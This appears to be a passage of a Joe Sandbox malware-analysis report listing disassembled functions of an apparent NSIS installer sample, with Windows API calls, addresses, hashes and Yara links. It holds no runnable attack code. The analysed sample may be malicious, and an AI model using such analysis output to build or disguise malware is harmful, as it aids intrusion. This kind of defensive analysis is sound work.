                                                      • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191
                                                      Strings
                                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 900638850-730719616
                                                      • Opcode ID: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                      • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                      • Opcode Fuzzy Hash: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                      • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                      Function 00404201 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                      • GetSysColor.USER32(00000000), ref: 0040423A
                                                      • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                      • SetBkMode.GDI32(?,?), ref: 00404252
                                                      • GetSysColor.USER32(?), ref: 00404265
                                                      • SetBkColor.GDI32(?,?), ref: 00404275
                                                      • DeleteObject.GDI32(?), ref: 0040428F
                                                      • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                      • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                      • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                      • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                      Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                        • Part of subcall function 00405C37: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                      • String ID: 9
                                                      • API String ID: 1149667376-2366072709
                                                      • Opcode ID: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                      • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                      • Opcode Fuzzy Hash: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                      • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                      Function 004027B5 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                      • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                      • String ID:
                                                      • API String ID: 3294113728-0
                                                      • Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                      • Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
                                                      • Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                      • Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
                                                      Function 004051F2 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                      • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                      • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                      • SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 2531174081-0
                                                      • Opcode ID: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                      • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                      • Opcode Fuzzy Hash: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                      • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                      Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                      • GetTickCount.KERNEL32 ref: 00402D53
                                                      • wsprintfW.USER32 ref: 00402D81
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                        • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                      • String ID: ... %d%%
                                                      • API String ID: 722711167-2449383134
                                                      • Opcode ID: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                      • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                      • Opcode Fuzzy Hash: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                      • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                      Function 00404ABC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                      • GetMessagePos.USER32 ref: 00404ADF
                                                      • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                      • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                      • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                      • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                      Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                      • wsprintfW.USER32 ref: 00402CD1
                                                      • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                      • API String ID: 1451636040-1158693248
                                                      • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                      • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                      • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                      • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                      Function 004049D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                      • wsprintfW.USER32 ref: 00404A70
                                                      • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s$&B
                                                      • API String ID: 3540041739-2907463167
                                                      • Opcode ID: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                      • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                      • Opcode Fuzzy Hash: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                      • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                      Function 004061DC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 0040623F
                                                      • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                      • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406253
                                                      • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406266
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: *?|<>/":
                                                      • API String ID: 589700163-165019052
                                                      • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                      • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                      • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                      • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                      Function 004024EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 0040252F
                                                      • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 00402536
                                                      • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ByteCharFileMultiWideWritelstrlen
                                                      • String ID: 8
                                                      • API String ID: 1453599865-4194326291
                                                      • Opcode ID: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                      • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                      • Opcode Fuzzy Hash: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                      • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                      Function 00401752 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                      • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                        • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID:
                                                      • API String ID: 1941528284-0
                                                      • Opcode ID: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                      • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                      • Opcode Fuzzy Hash: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                      • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                      Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Close$DeleteEnumOpen
                                                      • String ID:
                                                      • API String ID: 1912718029-0
                                                      • Opcode ID: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                      • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                      • Opcode Fuzzy Hash: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                      • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
                                                      Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                      • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                      • DeleteObject.GDI32(00000000), ref: 00401D36
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                      • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                      • Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                      • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                      Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401D44
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                      • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
